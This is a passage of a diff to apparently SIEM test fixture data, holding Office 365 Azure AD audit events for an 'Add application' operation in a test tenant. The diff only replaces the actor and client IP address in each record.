false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 
1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName
\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\"
:[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -16428,9 +16428,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { 
@@ -16648,7 +16648,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 
1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName
\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\"
:[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -16678,9 +16678,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { 
@@ -16898,7 +16898,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 
1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName
\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 